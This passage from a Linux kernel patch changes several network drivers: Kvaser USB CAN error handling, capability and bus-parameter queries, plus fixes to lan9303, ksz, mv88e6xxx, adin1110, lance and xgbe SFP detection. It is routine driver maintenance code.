++	case KVASER_USB_LEAF_CAP_CMD_ERR_REPORT:
++		value = le32_to_cpu(cmd->u.leaf.cap_res.value);
++		mask = le32_to_cpu(cmd->u.leaf.cap_res.mask);
++		break;
++	default:
++		dev_warn(&dev->intf->dev, "Unknown capability command %u\n",
++			 cap_cmd_res);
++		break;
++	}
++
++	for (i = 0; i < dev->nchannels; i++) {
++		if (BIT(i) & (value & mask)) {
++			switch (cap_cmd_res) {
++			case KVASER_USB_LEAF_CAP_CMD_LISTEN_MODE:
++				card_data->ctrlmode_supported |=
++						CAN_CTRLMODE_LISTENONLY;
++				break;
++			case KVASER_USB_LEAF_CAP_CMD_ERR_REPORT:
++				card_data->capabilities |=
++						KVASER_USB_CAP_BERR_CAP;
++				break;
++			}
++		}
++	}
++
++end:
++	kfree(cmd);
++
++	return err;
++}
++
++static int kvaser_usb_leaf_get_capabilities_leaf(struct kvaser_usb *dev)
++{
++	int err;
++	u16 status;
++
++	if (!(dev->card_data.capabilities & KVASER_USB_CAP_EXT_CAP)) {
++		dev_info(&dev->intf->dev,
++			 "No extended capability support. Upgrade device firmware.\n");
++		return 0;
++	}
++
++	err = kvaser_usb_leaf_get_single_capability(dev,
++						    KVASER_USB_LEAF_CAP_CMD_LISTEN_MODE,
++						    &status);
++	if (err)
++		return err;
++	if (status)
++		dev_info(&dev->intf->dev,
++			 "KVASER_USB_LEAF_CAP_CMD_LISTEN_MODE failed %u\n",
++			 status);
++
++	err = kvaser_usb_leaf_get_single_capability(dev,
++						    KVASER_USB_LEAF_CAP_CMD_ERR_REPORT,
++						    &status);
++	if (err)
++		return err;
++	if (status)
++		dev_info(&dev->intf->dev,
++			 "KVASER_USB_LEAF_CAP_CMD_ERR_REPORT failed %u\n",
++			 status);
++
++	return 0;
++}
++
++static int kvaser_usb_leaf_get_capabilities(struct kvaser_usb *dev)
++{
++	int err = 0;
++
++	if (dev->driver_info->family == KVASER_LEAF)
++		err = kvaser_usb_leaf_get_capabilities_leaf(dev);
++
++	return err;
++}
++
+ static void kvaser_usb_leaf_tx_acknowledge(const struct kvaser_usb *dev,
+ 					   const struct kvaser_cmd *cmd)
+ {
+@@ -721,7 +897,7 @@ static void kvaser_usb_leaf_tx_acknowledge(const struct kvaser_usb *dev,
+ 	context = &priv->tx_contexts[tid % dev->max_tx_urbs];
+ 
+ 	/* Sometimes the state change doesn't come after a bus-off event */
+-	if (priv->can.restart_ms && priv->can.state >= CAN_STATE_BUS_OFF) {
++	if (priv->can.restart_ms && priv->can.state == CAN_STATE_BUS_OFF) {
+ 		struct sk_buff *skb;
+ 		struct can_frame *cf;
+ 
+@@ -774,6 +950,16 @@ static int kvaser_usb_leaf_simple_cmd_async(struct kvaser_usb_net_priv *priv,
+ 	return err;
+ }
+ 
++static void kvaser_usb_leaf_chip_state_req_work(struct work_struct *work)
++{
++	struct kvaser_usb_net_leaf_priv *leaf =
++		container_of(work, struct kvaser_usb_net_leaf_priv,
++			     chip_state_req_work.work);
++	struct kvaser_usb_net_priv *priv = leaf->net;
++
++	kvaser_usb_leaf_simple_cmd_async(priv, CMD_GET_CHIP_STATE);
++}
++
+ static void
+ kvaser_usb_leaf_rx_error_update_can_state(struct kvaser_usb_net_priv *priv,
+ 					const struct kvaser_usb_err_summary *es,
+@@ -792,20 +978,16 @@ kvaser_usb_leaf_rx_error_update_can_state(struct kvaser_usb_net_priv *priv,
+ 		new_state = CAN_STATE_BUS_OFF;
+ 	} else if (es->status & M16C_STATE_BUS_PASSIVE) {
+ 		new_state = CAN_STATE_ERROR_PASSIVE;
+-	} else if (es->status & M16C_STATE_BUS_ERROR) {
++	} else if ((es->status & M16C_STATE_BUS_ERROR) &&
++		   cur_state >= CAN_STATE_BUS_OFF) {
+ 		/* Guard against spurious error events after a busoff */
+-		if (cur_state < CAN_STATE_BUS_OFF) {
+-			if (es->txerr >= 128 || es->rxerr >= 128)
+-				new_state = CAN_STATE_ERROR_PASSIVE;
+-			else if (es->txerr >= 96 || es->rxerr >= 96)
+-				new_state = CAN_STATE_ERROR_WARNING;
+-			else if (cur_state > CAN_STATE_ERROR_ACTIVE)
+-				new_state = CAN_STATE_ERROR_ACTIVE;
+-		}
+-	}
+-
+-	if (!es->status)
++	} else if (es->txerr >= 128 || es->rxerr >= 128) {
++		new_state = CAN_STATE_ERROR_PASSIVE;
++	} else if (es->txerr >= 96 || es->rxerr >= 96) {
++		new_state = CAN_STATE_ERROR_WARNING;
++	} else {
+ 		new_state = CAN_STATE_ERROR_ACTIVE;
++	}
+ 
+ 	if (new_state != cur_state) {
+ 		tx_state = (es->txerr >= es->rxerr) ? new_state : 0;
+@@ -815,7 +997,7 @@ kvaser_usb_leaf_rx_error_update_can_state(struct kvaser_usb_net_priv *priv,
+ 	}
+ 
+ 	if (priv->can.restart_ms &&
+-	    cur_state >= CAN_STATE_BUS_OFF &&
++	    cur_state == CAN_STATE_BUS_OFF &&
+ 	    new_state < CAN_STATE_BUS_OFF)
+ 		priv->can.can_stats.restarts++;
+ 
+@@ -849,6 +1031,7 @@ static void kvaser_usb_leaf_rx_error(const struct kvaser_usb *dev,
+ 	struct sk_buff *skb;
+ 	struct net_device_stats *stats;
+ 	struct kvaser_usb_net_priv *priv;
++	struct kvaser_usb_net_leaf_priv *leaf;
+ 	enum can_state old_state, new_state;
+ 
+ 	if (es->channel >= dev->nchannels) {
+@@ -858,8 +1041,13 @@ static void kvaser_usb_leaf_rx_error(const struct kvaser_usb *dev,
+ 	}
+ 
+ 	priv = dev->nets[es->channel];
++	leaf = priv->sub_priv;
+ 	stats = &priv->netdev->stats;
+ 
++	/* Ignore e.g. state change to bus-off reported just after stopping */
++	if (!netif_running(priv->netdev))
++		return;
++
+ 	/* Update all of the CAN interface's state and error counters before
+ 	 * trying any memory allocation that can actually fail with -ENOMEM.
+ 	 *
+@@ -874,6 +1062,14 @@ static void kvaser_usb_leaf_rx_error(const struct kvaser_usb *dev,
+ 	kvaser_usb_leaf_rx_error_update_can_state(priv, es, &tmp_cf);
+ 	new_state = priv->can.state;
+ 
++	/* If there are errors, request status updates periodically as we do
++	 * not get automatic notifications of improved state.
++	 */
++	if (new_state < CAN_STATE_BUS_OFF &&
++	    (es->rxerr || es->txerr || new_state == CAN_STATE_ERROR_PASSIVE))
++		schedule_delayed_work(&leaf->chip_state_req_work,
++				      msecs_to_jiffies(500));
++
+ 	skb = alloc_can_err_skb(priv->netdev, &cf);
+ 	if (!skb) {
+ 		stats->rx_dropped++;
+@@ -891,7 +1087,7 @@ static void kvaser_usb_leaf_rx_error(const struct kvaser_usb *dev,
+ 		}
+ 
+ 		if (priv->can.restart_ms &&
+-		    old_state >= CAN_STATE_BUS_OFF &&
++		    old_state == CAN_STATE_BUS_OFF &&
+ 		    new_state < CAN_STATE_BUS_OFF) {
+ 			cf->can_id |= CAN_ERR_RESTARTED;
+ 			netif_carrier_on(priv->netdev);
+@@ -990,11 +1186,11 @@ static void kvaser_usb_leaf_usbcan_rx_error(const struct kvaser_usb *dev,
+ 
+ 	case CMD_CAN_ERROR_EVENT:
+ 		es.channel = 0;
+-		es.status = cmd->u.usbcan.error_event.status_ch0;
+-		es.txerr = cmd->u.usbcan.error_event.tx_errors_count_ch0;
+-		es.rxerr = cmd->u.usbcan.error_event.rx_errors_count_ch0;
++		es.status = cmd->u.usbcan.can_error_event.status_ch0;
++		es.txerr = cmd->u.usbcan.can_error_event.tx_errors_count_ch0;
++		es.rxerr = cmd->u.usbcan.can_error_event.rx_errors_count_ch0;
+ 		es.usbcan.other_ch_status =
+-			cmd->u.usbcan.error_event.status_ch1;
++			cmd->u.usbcan.can_error_event.status_ch1;
+ 		kvaser_usb_leaf_usbcan_conditionally_rx_error(dev, &es);
+ 
+ 		/* The USBCAN firmware supports up to 2 channels.
+@@ -1002,13 +1198,13 @@ static void kvaser_usb_leaf_usbcan_rx_error(const struct kvaser_usb *dev,
+ 		 */
+ 		if (dev->nchannels == MAX_USBCAN_NET_DEVICES) {
+ 			es.channel = 1;
+-			es.status = cmd->u.usbcan.error_event.status_ch1;
++			es.status = cmd->u.usbcan.can_error_event.status_ch1;
+ 			es.txerr =
+-				cmd->u.usbcan.error_event.tx_errors_count_ch1;
++				cmd->u.usbcan.can_error_event.tx_errors_count_ch1;
+ 			es.rxerr =
+-				cmd->u.usbcan.error_event.rx_errors_count_ch1;
++				cmd->u.usbcan.can_error_event.rx_errors_count_ch1;
+ 			es.usbcan.other_ch_status =
+-				cmd->u.usbcan.error_event.status_ch0;
++				cmd->u.usbcan.can_error_event.status_ch0;
+ 			kvaser_usb_leaf_usbcan_conditionally_rx_error(dev, &es);
+ 		}
+ 		break;
+@@ -1025,11 +1221,11 @@ static void kvaser_usb_leaf_leaf_rx_error(const struct kvaser_usb *dev,
+ 
+ 	switch (cmd->id) {
+ 	case CMD_CAN_ERROR_EVENT:
+-		es.channel = cmd->u.leaf.error_event.channel;
+-		es.status = cmd->u.leaf.error_event.status;
+-		es.txerr = cmd->u.leaf.error_event.tx_errors_count;
+-		es.rxerr = cmd->u.leaf.error_event.rx_errors_count;
+-		es.leaf.error_factor = cmd->u.leaf.error_event.error_factor;
++		es.channel = cmd->u.leaf.can_error_event.channel;
++		es.status = cmd->u.leaf.can_error_event.status;
++		es.txerr = cmd->u.leaf.can_error_event.tx_errors_count;
++		es.rxerr = cmd->u.leaf.can_error_event.rx_errors_count;
++		es.leaf.error_factor = cmd->u.leaf.can_error_event.error_factor;
+ 		break;
+ 	case CMD_LEAF_LOG_MESSAGE:
+ 		es.channel = cmd->u.leaf.log_message.channel;
+@@ -1162,6 +1358,74 @@ static void kvaser_usb_leaf_rx_can_msg(const struct kvaser_usb *dev,
+ 	netif_rx(skb);
+ }
+ 
++static void kvaser_usb_leaf_error_event_parameter(const struct kvaser_usb *dev,
++						  const struct kvaser_cmd *cmd)
++{
++	u16 info1 = 0;
++
++	switch (dev->driver_info->family) {
++	case KVASER_LEAF:
++		info1 = le16_to_cpu(cmd->u.leaf.error_event.info1);
++		break;
++	case KVASER_USBCAN:
++		info1 = le16_to_cpu(cmd->u.usbcan.error_event.info1);
++		break;
++	}
++
++	/* info1 will contain the offending cmd_no */
++	switch (info1) {
++	case CMD_SET_CTRL_MODE:
++		dev_warn(&dev->intf->dev,
++			 "CMD_SET_CTRL_MODE error in parameter\n");
++		break;
++
++	case CMD_SET_BUS_PARAMS:
++		dev_warn(&dev->intf->dev,
++			 "CMD_SET_BUS_PARAMS error in parameter\n");
++		break;
++
++	default:
++		dev_warn(&dev->intf->dev,
++			 "Unhandled parameter error event cmd_no (%u)\n",
++			 info1);
++		break;
++	}
++}
++
++static void kvaser_usb_leaf_error_event(const struct kvaser_usb *dev,
++					const struct kvaser_cmd *cmd)
++{
++	u8 error_code = 0;
++
++	switch (dev->driver_info->family) {
++	case KVASER_LEAF:
++		error_code = cmd->u.leaf.error_event.error_code;
++		break;
++	case KVASER_USBCAN:
++		error_code = cmd->u.usbcan.error_event.error_code;
++		break;
++	}
++
++	switch (error_code) {
++	case KVASER_USB_LEAF_ERROR_EVENT_TX_QUEUE_FULL:
++		/* Received an additional CAN message when the firmware TX
++		 * queue is already full. Something is wrong with the driver.
++		 * This should never happen!
++		 */
++		dev_err(&dev->intf->dev,
++			"Received error event TX_QUEUE_FULL\n");
++		break;
++	case KVASER_USB_LEAF_ERROR_EVENT_PARAM:
++		kvaser_usb_leaf_error_event_parameter(dev, cmd);
++		break;
++
++	default:
++		dev_warn(&dev->intf->dev,
++			 "Unhandled error event (%d)\n", error_code);
++		break;
++	}
++}
++
+ static void kvaser_usb_leaf_start_chip_reply(const struct kvaser_usb *dev,
+ 					     const struct kvaser_cmd *cmd)
+ {
+@@ -1202,6 +1466,25 @@ static void kvaser_usb_leaf_stop_chip_reply(const struct kvaser_usb *dev,
+ 	complete(&priv->stop_comp);
+ }
+ 
++static void kvaser_usb_leaf_get_busparams_reply(const struct kvaser_usb *dev,
++						const struct kvaser_cmd *cmd)
++{
++	struct kvaser_usb_net_priv *priv;
++	u8 channel = cmd->u.busparams.channel;
++
++	if (channel >= dev->nchannels) {
++		dev_err(&dev->intf->dev,
++			"Invalid channel number (%d)\n", channel);
++		return;
++	}
++
++	priv = dev->nets[channel];
++	memcpy(&priv->busparams_nominal, &cmd->u.busparams.busparams,
++	       sizeof(priv->busparams_nominal));
++
++	complete(&priv->get_busparams_comp);
++}
++
+ static void kvaser_usb_leaf_handle_command(const struct kvaser_usb *dev,
+ 					   const struct kvaser_cmd *cmd)
+ {
+@@ -1240,6 +1523,14 @@ static void kvaser_usb_leaf_handle_command(const struct kvaser_usb *dev,
+ 		kvaser_usb_leaf_tx_acknowledge(dev, cmd);
+ 		break;
+ 
++	case CMD_ERROR_EVENT:
++		kvaser_usb_leaf_error_event(dev, cmd);
++		break;
++
++	case CMD_GET_BUS_PARAMS_REPLY:
++		kvaser_usb_leaf_get_busparams_reply(dev, cmd);
++		break;
++
+ 	/* Ignored commands */
+ 	case CMD_USBCAN_CLOCK_OVERFLOW_EVENT:
+ 		if (dev->driver_info->family != KVASER_USBCAN)
+@@ -1336,10 +1627,13 @@ static int kvaser_usb_leaf_start_chip(struct kvaser_usb_net_priv *priv)
+ 
+ static int kvaser_usb_leaf_stop_chip(struct kvaser_usb_net_priv *priv)
+ {
++	struct kvaser_usb_net_leaf_priv *leaf = priv->sub_priv;
+ 	int err;
+ 
+ 	reinit_completion(&priv->stop_comp);
+ 
++	cancel_delayed_work(&leaf->chip_state_req_work);
++
+ 	err = kvaser_usb_leaf_send_simple_cmd(priv->dev, CMD_STOP_CHIP,
+ 					      priv->channel);
+ 	if (err)
+@@ -1386,10 +1680,35 @@ static int kvaser_usb_leaf_init_card(struct kvaser_usb *dev)
+ 	return 0;
+ }
+ 
+-static int kvaser_usb_leaf_set_bittiming(struct net_device *netdev)
++static int kvaser_usb_leaf_init_channel(struct kvaser_usb_net_priv *priv)
++{
++	struct kvaser_usb_net_leaf_priv *leaf;
++
++	leaf = devm_kzalloc(&priv->dev->intf->dev, sizeof(*leaf), GFP_KERNEL);
++	if (!leaf)
++		return -ENOMEM;
++
++	leaf->net = priv;
++	INIT_DELAYED_WORK(&leaf->chip_state_req_work,
++			  kvaser_usb_leaf_chip_state_req_work);
++
++	priv->sub_priv = leaf;
++
++	return 0;
++}
++
++static void kvaser_usb_leaf_remove_channel(struct kvaser_usb_net_priv *priv)
++{
++	struct kvaser_usb_net_leaf_priv *leaf = priv->sub_priv;
++
++	if (leaf)
++		cancel_delayed_work_sync(&leaf->chip_state_req_work);
++}
++
++static int kvaser_usb_leaf_set_bittiming(const struct net_device *netdev,
++					 const struct kvaser_usb_busparams *busparams)
+ {
+ 	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
+-	struct can_bittiming *bt = &priv->can.bittiming;
+ 	struct kvaser_usb *dev = priv->dev;
+ 	struct kvaser_cmd *cmd;
+ 	int rc;
+@@ -1402,15 +1721,8 @@ static int kvaser_usb_leaf_set_bittiming(struct net_device *netdev)
+ 	cmd->len = CMD_HEADER_LEN + sizeof(struct kvaser_cmd_busparams);
+ 	cmd->u.busparams.channel = priv->channel;
+ 	cmd->u.busparams.tid = 0xff;
+-	cmd->u.busparams.bitrate = cpu_to_le32(bt->bitrate);
+-	cmd->u.busparams.sjw = bt->sjw;
+-	cmd->u.busparams.tseg1 = bt->prop_seg + bt->phase_seg1;
+-	cmd->u.busparams.tseg2 = bt->phase_seg2;
+-
+-	if (priv->can.ctrlmode & CAN_CTRLMODE_3_SAMPLES)
+-		cmd->u.busparams.no_samp = 3;
+-	else
+-		cmd->u.busparams.no_samp = 1;
++	memcpy(&cmd->u.busparams.busparams, busparams,
++	       sizeof(cmd->u.busparams.busparams));
+ 
+ 	rc = kvaser_usb_send_cmd(dev, cmd, cmd->len);
+ 
+@@ -1418,6 +1730,27 @@ static int kvaser_usb_leaf_set_bittiming(struct net_device *netdev)
+ 	return rc;
+ }
+ 
++static int kvaser_usb_leaf_get_busparams(struct kvaser_usb_net_priv *priv)
++{
++	int err;
++
++	if (priv->dev->driver_info->family == KVASER_USBCAN)
++		return -EOPNOTSUPP;
++
++	reinit_completion(&priv->get_busparams_comp);
++
++	err = kvaser_usb_leaf_send_simple_cmd(priv->dev, CMD_GET_BUS_PARAMS,
++					      priv->channel);
++	if (err)
++		return err;
++
++	if (!wait_for_completion_timeout(&priv->get_busparams_comp,
++					 msecs_to_jiffies(KVASER_USB_TIMEOUT)))
++		return -ETIMEDOUT;
++
++	return 0;
++}
++
+ static int kvaser_usb_leaf_set_mode(struct net_device *netdev,
+ 				    enum can_mode mode)
+ {
+@@ -1479,14 +1812,18 @@ static int kvaser_usb_leaf_setup_endpoints(struct kvaser_usb *dev)
+ const struct kvaser_usb_dev_ops kvaser_usb_leaf_dev_ops = {
+ 	.dev_set_mode = kvaser_usb_leaf_set_mode,
+ 	.dev_set_bittiming = kvaser_usb_leaf_set_bittiming,
++	.dev_get_busparams = kvaser_usb_leaf_get_busparams,
+ 	.dev_set_data_bittiming = NULL,
++	.dev_get_data_busparams = NULL,
+ 	.dev_get_berr_counter = kvaser_usb_leaf_get_berr_counter,
+ 	.dev_setup_endpoints = kvaser_usb_leaf_setup_endpoints,
+ 	.dev_init_card = kvaser_usb_leaf_init_card,
++	.dev_init_channel = kvaser_usb_leaf_init_channel,
++	.dev_remove_channel = kvaser_usb_leaf_remove_channel,
+ 	.dev_get_software_info = kvaser_usb_leaf_get_software_info,
+ 	.dev_get_software_details = NULL,
+ 	.dev_get_card_info = kvaser_usb_leaf_get_card_info,
+-	.dev_get_capabilities = NULL,
++	.dev_get_capabilities = kvaser_usb_leaf_get_capabilities,
+ 	.dev_set_opt_mode = kvaser_usb_leaf_set_opt_mode,
+ 	.dev_start_chip = kvaser_usb_leaf_start_chip,
+ 	.dev_stop_chip = kvaser_usb_leaf_stop_chip,
+diff --git a/drivers/net/dsa/lan9303-core.c b/drivers/net/dsa/lan9303-core.c
+index 80f07bd205934..2e270b4791432 100644
+--- a/drivers/net/dsa/lan9303-core.c
++++ b/drivers/net/dsa/lan9303-core.c
+@@ -1005,9 +1005,11 @@ static void lan9303_get_ethtool_stats(struct dsa_switch *ds, int port,
+ 		ret = lan9303_read_switch_port(
+ 			chip, port, lan9303_mib[u].offset, &reg);
+ 
+-		if (ret)
++		if (ret) {
+ 			dev_warn(chip->dev, "Reading status port %d reg %u failed\n",
+ 				 port, lan9303_mib[u].offset);
++			reg = 0;
++		}
+ 		data[u] = reg;
+ 	}
+ }
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index d612181b3226e..c68f48cd1ec08 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -1883,8 +1883,7 @@ static int ksz_irq_common_setup(struct ksz_device *dev, struct ksz_irq *kirq)
+ 		irq_create_mapping(kirq->domain, n);
+ 
+ 	ret = request_threaded_irq(kirq->irq_num, NULL, ksz_irq_thread_fn,
+-				   IRQF_ONESHOT | IRQF_TRIGGER_FALLING,
+-				   kirq->name, kirq);
++				   IRQF_ONESHOT, kirq->name, kirq);
+ 	if (ret)
+ 		goto out;
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 937cb22cb3d48..3b8b2d0fbafaf 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -689,13 +689,12 @@ static void mv88e6352_phylink_get_caps(struct mv88e6xxx_chip *chip, int port,
+ 
+ 	/* Port 4 supports automedia if the serdes is associated with it. */
+ 	if (port == 4) {
+-		mv88e6xxx_reg_lock(chip);
+ 		err = mv88e6352_g2_scratch_port_has_serdes(chip, port);
+ 		if (err < 0)
+ 			dev_err(chip->dev, "p%d: failed to read scratch\n",
+ 				port);
+ 		if (err <= 0)
+-			goto unlock;
++			return;
+ 
+ 		cmode = mv88e6352_get_port4_serdes_cmode(chip);
+ 		if (cmode < 0)
+@@ -703,8 +702,6 @@ static void mv88e6352_phylink_get_caps(struct mv88e6xxx_chip *chip, int port,
+ 				port);
+ 		else
+ 			mv88e6xxx_translate_cmode(cmode, supported);
+-unlock:
+-		mv88e6xxx_reg_unlock(chip);
+ 	}
+ }
+ 
+@@ -831,7 +828,9 @@ static void mv88e6xxx_get_caps(struct dsa_switch *ds, int port,
+ {
+ 	struct mv88e6xxx_chip *chip = ds->priv;
+ 
++	mv88e6xxx_reg_lock(chip);
+ 	chip->info->ops->phylink_get_caps(chip, port, config);
++	mv88e6xxx_reg_unlock(chip);
+ 
+ 	if (mv88e6xxx_phy_is_internal(ds, port)) {
+ 		__set_bit(PHY_INTERFACE_MODE_INTERNAL,
+@@ -3307,7 +3306,7 @@ static int mv88e6xxx_setup_port(struct mv88e6xxx_chip *chip, int port)
+ 		struct phylink_config pl_config = {};
+ 		unsigned long caps;
+ 
+-		mv88e6xxx_get_caps(ds, port, &pl_config);
++		chip->info->ops->phylink_get_caps(chip, port, &pl_config);
+ 
+ 		caps = pl_config.mac_capabilities;
+ 
+diff --git a/drivers/net/ethernet/adi/adin1110.c b/drivers/net/ethernet/adi/adin1110.c
+index 606c976108085..9d8dfe1729948 100644
+--- a/drivers/net/ethernet/adi/adin1110.c
++++ b/drivers/net/ethernet/adi/adin1110.c
+@@ -196,7 +196,7 @@ static int adin1110_read_reg(struct adin1110_priv *priv, u16 reg, u32 *val)
+ {
+ 	u32 header_len = ADIN1110_RD_HEADER_LEN;
+ 	u32 read_len = ADIN1110_REG_LEN;
+-	struct spi_transfer t[2] = {0};
++	struct spi_transfer t = {0};
+ 	int ret;
+ 
+ 	priv->data[0] = ADIN1110_CD | FIELD_GET(GENMASK(12, 8), reg);
+@@ -209,17 +209,15 @@ static int adin1110_read_reg(struct adin1110_priv *priv, u16 reg, u32 *val)
+ 		header_len++;
+ 	}
+ 
+-	t[0].tx_buf = &priv->data[0];
+-	t[0].len = header_len;
+-
+ 	if (priv->append_crc)
+ 		read_len++;
+ 
+ 	memset(&priv->data[header_len], 0, read_len);
+-	t[1].rx_buf = &priv->data[header_len];
+-	t[1].len = read_len;
++	t.tx_buf = &priv->data[0];
++	t.rx_buf = &priv->data[0];
++	t.len = read_len + header_len;
+ 
+-	ret = spi_sync_transfer(priv->spidev, t, 2);
++	ret = spi_sync_transfer(priv->spidev, &t, 1);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -296,7 +294,7 @@ static int adin1110_read_fifo(struct adin1110_port_priv *port_priv)
+ {
+ 	struct adin1110_priv *priv = port_priv->priv;
+ 	u32 header_len = ADIN1110_RD_HEADER_LEN;
+-	struct spi_transfer t[2] = {0};
++	struct spi_transfer t = {0};
+ 	u32 frame_size_no_fcs;
+ 	struct sk_buff *rxb;
+ 	u32 frame_size;
+@@ -327,12 +325,7 @@ static int adin1110_read_fifo(struct adin1110_port_priv *port_priv)
+ 		return ret;
+ 
+ 	frame_size_no_fcs = frame_size - ADIN1110_FRAME_HEADER_LEN - ADIN1110_FEC_LEN;
+-
+-	rxb = netdev_alloc_skb(port_priv->netdev, round_len);
+-	if (!rxb)
+-		return -ENOMEM;
+-
+-	memset(priv->data, 0, round_len + ADIN1110_RD_HEADER_LEN);
++	memset(priv->data, 0, ADIN1110_RD_HEADER_LEN);
+ 
+ 	priv->data[0] = ADIN1110_CD | FIELD_GET(GENMASK(12, 8), reg);
+ 	priv->data[1] = FIELD_GET(GENMASK(7, 0), reg);
+@@ -342,21 +335,23 @@ static int adin1110_read_fifo(struct adin1110_port_priv *port_priv)
+ 		header_len++;
+ 	}
+ 
+-	skb_put(rxb, frame_size_no_fcs + ADIN1110_FRAME_HEADER_LEN);
++	rxb = netdev_alloc_skb(port_priv->netdev, round_len + header_len);
++	if (!rxb)
++		return -ENOMEM;
+ 
+-	t[0].tx_buf = &priv->data[0];
+-	t[0].len = header_len;
++	skb_put(rxb, frame_size_no_fcs + header_len + ADIN1110_FRAME_HEADER_LEN);
+ 
+-	t[1].rx_buf = &rxb->data[0];
+-	t[1].len = round_len;
++	t.tx_buf = &priv->data[0];
++	t.rx_buf = &rxb->data[0];
++	t.len = header_len + round_len;
+ 
+-	ret = spi_sync_transfer(priv->spidev, t, 2);
++	ret = spi_sync_transfer(priv->spidev, &t, 1);
+ 	if (ret) {
+ 		kfree_skb(rxb);
+ 		return ret;
+ 	}
+ 
+-	skb_pull(rxb, ADIN1110_FRAME_HEADER_LEN);
++	skb_pull(rxb, header_len + ADIN1110_FRAME_HEADER_LEN);
+ 	rxb->protocol = eth_type_trans(rxb, port_priv->netdev);
+ 
+ 	if ((port_priv->flags & IFF_ALLMULTI && rxb->pkt_type == PACKET_MULTICAST) ||
+diff --git a/drivers/net/ethernet/amd/atarilance.c b/drivers/net/ethernet/amd/atarilance.c
+index 3222c48ce6ae4..ec704222925d8 100644
+--- a/drivers/net/ethernet/amd/atarilance.c
++++ b/drivers/net/ethernet/amd/atarilance.c
+@@ -824,7 +824,7 @@ lance_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	lp->memcpy_f( PKTBUF_ADDR(head), (void *)skb->data, skb->len );
+ 	head->flag = TMD1_OWN_CHIP | TMD1_ENP | TMD1_STP;
+ 	dev->stats.tx_bytes += skb->len;
+-	dev_kfree_skb( skb );
++	dev_consume_skb_irq(skb);
+ 	lp->cur_tx++;
+ 	while( lp->cur_tx >= TX_RING_SIZE && lp->dirty_tx >= TX_RING_SIZE ) {
+ 		lp->cur_tx -= TX_RING_SIZE;
+diff --git a/drivers/net/ethernet/amd/lance.c b/drivers/net/ethernet/amd/lance.c
+index fb8686214a327..8971665a4b2ac 100644
+--- a/drivers/net/ethernet/amd/lance.c
++++ b/drivers/net/ethernet/amd/lance.c
+@@ -1001,7 +1001,7 @@ static netdev_tx_t lance_start_xmit(struct sk_buff *skb,
+ 		skb_copy_from_linear_data(skb, &lp->tx_bounce_buffs[entry], skb->len);
+ 		lp->tx_ring[entry].base =
+ 			((u32)isa_virt_to_bus((lp->tx_bounce_buffs + entry)) & 0xffffff) | 0x83000000;
+-		dev_kfree_skb(skb);
++		dev_consume_skb_irq(skb);
+ 	} else {
+ 		lp->tx_skbuff[entry] = skb;
+ 		lp->tx_ring[entry].base = ((u32)isa_virt_to_bus(skb->data) & 0xffffff) | 0x83000000;
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-phy-v2.c b/drivers/net/ethernet/amd/xgbe/xgbe-phy-v2.c
+index 4064c3e3dd492..c731a04731f83 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-phy-v2.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-phy-v2.c
+@@ -189,6 +189,7 @@ enum xgbe_sfp_cable {
+ 	XGBE_SFP_CABLE_UNKNOWN = 0,
+ 	XGBE_SFP_CABLE_ACTIVE,
+ 	XGBE_SFP_CABLE_PASSIVE,
++	XGBE_SFP_CABLE_FIBER,
+ };
+ 
+ enum xgbe_sfp_base {
+@@ -236,10 +237,7 @@ enum xgbe_sfp_speed {
+ 
+ #define XGBE_SFP_BASE_BR			12
+ #define XGBE_SFP_BASE_BR_1GBE_MIN		0x0a
+-#define XGBE_SFP_BASE_BR_1GBE_MAX		0x0d
+ #define XGBE_SFP_BASE_BR_10GBE_MIN		0x64
+-#define XGBE_SFP_BASE_BR_10GBE_MAX		0x68
+-#define XGBE_MOLEX_SFP_BASE_BR_10GBE_MAX	0x78
+ 
+ #define XGBE_SFP_BASE_CU_CABLE_LEN		18
+ 
+@@ -826,29 +824,22 @@ static void xgbe_phy_sfp_phy_settings(struct xgbe_prv_data *pdata)
+ static bool xgbe_phy_sfp_bit_rate(struct xgbe_sfp_eeprom *sfp_eeprom,
+ 				  enum xgbe_sfp_speed sfp_speed)
+ {
+-	u8 *sfp_base, min, max;
++	u8 *sfp_base, min;
+ 
+ 	sfp_base = sfp_eeprom->base;
+ 
+ 	switch (sfp_speed) {
+ 	case XGBE_SFP_SPEED_1000:
+ 		min = XGBE_SFP_BASE_BR_1GBE_MIN;
+-		max = XGBE_SFP_BASE_BR_1GBE_MAX;
+ 		break;
+ 	case XGBE_SFP_SPEED_10000:
+ 		min = XGBE_SFP_BASE_BR_10GBE_MIN;
+-		if (memcmp(&sfp_eeprom->base[XGBE_SFP_BASE_VENDOR_NAME],
+-			   XGBE_MOLEX_VENDOR, XGBE_SFP_BASE_VENDOR_NAME_LEN) == 0)
+-			max = XGBE_MOLEX_SFP_BASE_BR_10GBE_MAX;
+-		else
+-			max = XGBE_SFP_BASE_BR_10GBE_MAX;
+ 		break;
+ 	default:
+ 		return false;
+ 	}
+ 
+-	return ((sfp_base[XGBE_SFP_BASE_BR] >= min) &&
+-		(sfp_base[XGBE_SFP_BASE_BR] <= max));
++	return sfp_base[XGBE_SFP_BASE_BR] >= min;
+ }
+ 
+ static void xgbe_phy_free_phy_device(struct xgbe_prv_data *pdata)
+@@ -1149,16 +1140,18 @@ static void xgbe_phy_sfp_parse_eeprom(struct xgbe_prv_data *pdata)
+ 	phy_data->sfp_tx_fault = xgbe_phy_check_sfp_tx_fault(phy_data);
+ 	phy_data->sfp_rx_los = xgbe_phy_check_sfp_rx_los(phy_data);
+ 
+-	/* Assume ACTIVE cable unless told it is PASSIVE */
++	/* Assume FIBER cable unless told otherwise */
+ 	if (sfp_base[XGBE_SFP_BASE_CABLE] & XGBE_SFP_BASE_CABLE_PASSIVE) {
+ 		phy_data->sfp_cable = XGBE_SFP_CABLE_PASSIVE;
+ 		phy_data->sfp_cable_len = sfp_base[XGBE_SFP_BASE_CU_CABLE_LEN];
+-	} else {
